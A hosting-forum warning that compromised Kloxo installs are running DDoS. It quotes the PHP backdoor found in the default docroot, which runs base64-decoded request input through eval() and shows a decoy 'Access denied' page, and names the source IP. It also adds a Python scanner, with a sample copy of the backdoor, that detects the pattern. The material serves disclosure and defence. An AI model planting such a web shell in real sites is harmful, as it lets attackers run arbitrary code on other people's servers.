FluidaWeb
Hosting Guru
Information for Kloxo users and VPS providers: many Kloxo installations have been compromised and are being used for DDoS, and I have read that a lot of VPS providers are carrying out mass suspensions because of it. So VPS providers, please check; your servers may be quietly carrying out DDoS attacks.
I don't know whether this also applies to Kloxo MR.
This is information from an overseas forum where it is currently being discussed a lot:
We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.
Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into ./home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.
UPDATE: default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=
This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):
Code:
<?php
set_time_limit(0);error_reporting(NULL);
// If the randomly named request parameter is present, base64-decode its value and execute it as PHP
if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
// Otherwise print a bland "Access denied." page so casual visitors see nothing unusual
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\">Access denied.';}
?>
All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)
Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's affected Ramnode, if not others. Beware!
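As an added defender-side check (not part of either post above): a small Python scanner that walks a document root such as the /home/kloxo/httpd/default/ path named in the post and reports every PHP file whose source feeds a request parameter through base64_decode() into eval(), returning the parameter name so it can then be searched for in the web server's access logs. The two sample files it writes for the demo are constructed here; the file name k8d1x.php is a made-up stand-in for the random names described.

```python
# Added example (not from the post): scan a Kloxo 'default' docroot for PHP
# files carrying the eval(base64_decode($_REQUEST[...])) backdoor quoted above.
import re
import tempfile
from pathlib import Path

# Matches eval(base64_decode($_REQUEST['name'])) and the $_GET/$_POST/$_COOKIE
# variants, capturing the parameter name the attacker uses to pass code.
BACKDOOR_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)"
    r"\s*\[\s*['\"]([^'\"]+)['\"]\s*\]",
    re.IGNORECASE,
)

# Constructed sample: the dropper from the post, with the same parameter name.
SAMPLE_BACKDOOR = (
    "<?php set_time_limit(0);error_reporting(NULL);\n"
    "if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL)"
    "{eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}\n"
    "else{echo 'Access denied.';} ?>\n"
)
SAMPLE_BENIGN = "<?php echo 'It works!'; ?>\n"  # constructed clean file

def find_backdoor_params(source: str) -> list:
    """Return the request-parameter names that are base64-decoded into eval()."""
    return BACKDOOR_RE.findall(source)

def scan_docroot(docroot: str) -> list:
    """Walk docroot and report every .php file matching the backdoor pattern."""
    hits = []
    for path in sorted(Path(docroot).rglob("*.php")):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        params = find_backdoor_params(text)
        if params:
            hits.append({"path": str(path), "params": params,
                         "mtime": path.stat().st_mtime})  # mtime helps build a timeline
    return hits

def demo() -> list:
    """Build a throwaway docroot with one clean and one backdoored file, scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "index.php").write_text(SAMPLE_BENIGN)
        Path(tmp, "k8d1x.php").write_text(SAMPLE_BACKDOOR)  # random-looking name
        return [{"name": Path(h["path"]).name, "params": h["params"]}
                for h in scan_docroot(tmp)]
```

On a real server call scan_docroot("/home/kloxo/httpd/default") and grep the returned parameter names in the access logs to find which client IPs have been invoking the file.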